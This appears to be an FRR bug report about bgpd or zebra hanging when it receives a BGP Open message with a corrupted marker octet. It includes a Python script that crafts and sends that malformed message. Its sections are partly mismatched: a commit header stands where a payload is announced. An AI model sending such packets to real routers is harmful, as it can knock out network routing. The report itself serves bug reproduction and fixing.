Closed mwinter-osr closed 1 year ago
Here is a way to reproduce the issue:
Set up a simple network with two boxes: one running FRR (DUT) and one running plain Linux for the test tool (TESTER):
+-----------+                    +------------+
|           |   192.168.1.0/24   |            |
|  TESTER   +--------------------+    DUT     |
|           | .1            .101 |            |
+-----------+                    +------------+
Configure the interface on the TESTER side with the address 192.168.1.1/24.
Start zebra, staticd and bgpd on the DUT and apply the following config:
Current configuration:
!
frr version 8.5-dev-20230131211350-git.aa16204
frr defaults traditional
hostname bgp-marker-dut
log file /tmp/frr.log
no ip forwarding
no ipv6 forwarding
service integrated-vtysh-config
!
debug zebra events
debug bgp keepalives
debug bgp neighbor-events
debug bgp zebra
!
interface ens1
 ip address 192.168.1.101/24
exit
!
router bgp 501
 neighbor 192.168.1.1 remote-as 500
exit
!
end
Now build BGPTOOL (https://git-us.netdef.org/scm/netdef/bgptool.git) and run the executable test_bgp_bad-open-message_marker.
Approximately 10 to 15 seconds later, zebra hangs (as seen with vtysh commands).
In my testing, it does not look like zebra becomes unresponsive; bgpd does.
2023-02-02 13:27:24.016 [INFO] watchfrr: [YFT0P-5Q5YX] Forked background command [pid 2488116]: /usr/lib/frr/watchfrr.sh restart bgpd
show thread cpu stalls on bgpd.
This was found on Ubuntu with FRR master @aa16204dfbff (Jan 31). The issue DOES NOT exist in 8.4.
During testing, when an invalid BGP Open message is sent with the first octet of the marker field overwritten with 0, zebra ends up hanging and no longer responds to any vtysh command or writes any logs. Nothing is logged for this error.
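For readers without BGPTOOL at hand, the following is a minimal Python sketch of how an Open message with a corrupted marker could be built and sent. It is not the BGPTOOL test itself and does not reproduce its exact payload. The message layout follows RFC 4271; the AS number 500 and the addresses come from the setup above, while the hold time (90), the BGP identifier (192.168.1.1), the absence of optional parameters, and the helper names build_open and send_open are assumptions made for illustration.

```python
import socket
import struct

BGP_PORT = 179        # well-known BGP TCP port
BGP_TYPE_OPEN = 1     # message type code for OPEN (RFC 4271)


def build_open(my_as: int, hold_time: int, bgp_id: str,
               corrupt_marker: bool = True) -> bytes:
    """Build a BGP OPEN message without optional parameters.

    If corrupt_marker is True, the first octet of the 16-octet marker
    is overwritten with 0 instead of 0xff, making the header invalid.
    """
    marker = bytearray(b"\xff" * 16)
    if corrupt_marker:
        marker[0] = 0x00

    # OPEN body: version, my AS, hold time, BGP identifier, opt param length
    body = struct.pack("!BHH4sB", 4, my_as, hold_time,
                       socket.inet_aton(bgp_id), 0)

    # Header: marker (16) + length (2) + type (1); length covers the header too
    length = 16 + 2 + 1 + len(body)
    return bytes(marker) + struct.pack("!HB", length, BGP_TYPE_OPEN) + body


def send_open(dut_ip: str, payload: bytes, timeout: float = 5.0) -> None:
    """Open a TCP session to the DUT and send the payload (hypothetical helper)."""
    with socket.create_connection((dut_ip, BGP_PORT), timeout=timeout) as sock:
        sock.sendall(payload)


if __name__ == "__main__":
    # Assumed values: hold time 90 and router ID 192.168.1.1 are illustrative.
    msg = build_open(my_as=500, hold_time=90, bgp_id="192.168.1.1")
    print(msg.hex())
    # To send it from the TESTER: send_open("192.168.1.101", msg)
```

Running send_open from the TESTER (192.168.1.1) against the DUT at 192.168.1.101 should exercise the same marker check, though whether it triggers the hang exactly as the BGPTOOL test does has not been verified here.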
TCP Payload for the BGP Open Message:
commit a0b937de428e14e869b8541f0b7810113d619c2e
Author: Stephen Worley <sworley@nvidia.com>
Date: Fri Oct 21 12:45:50 2022 -0400
Thread info when attaching with GDB: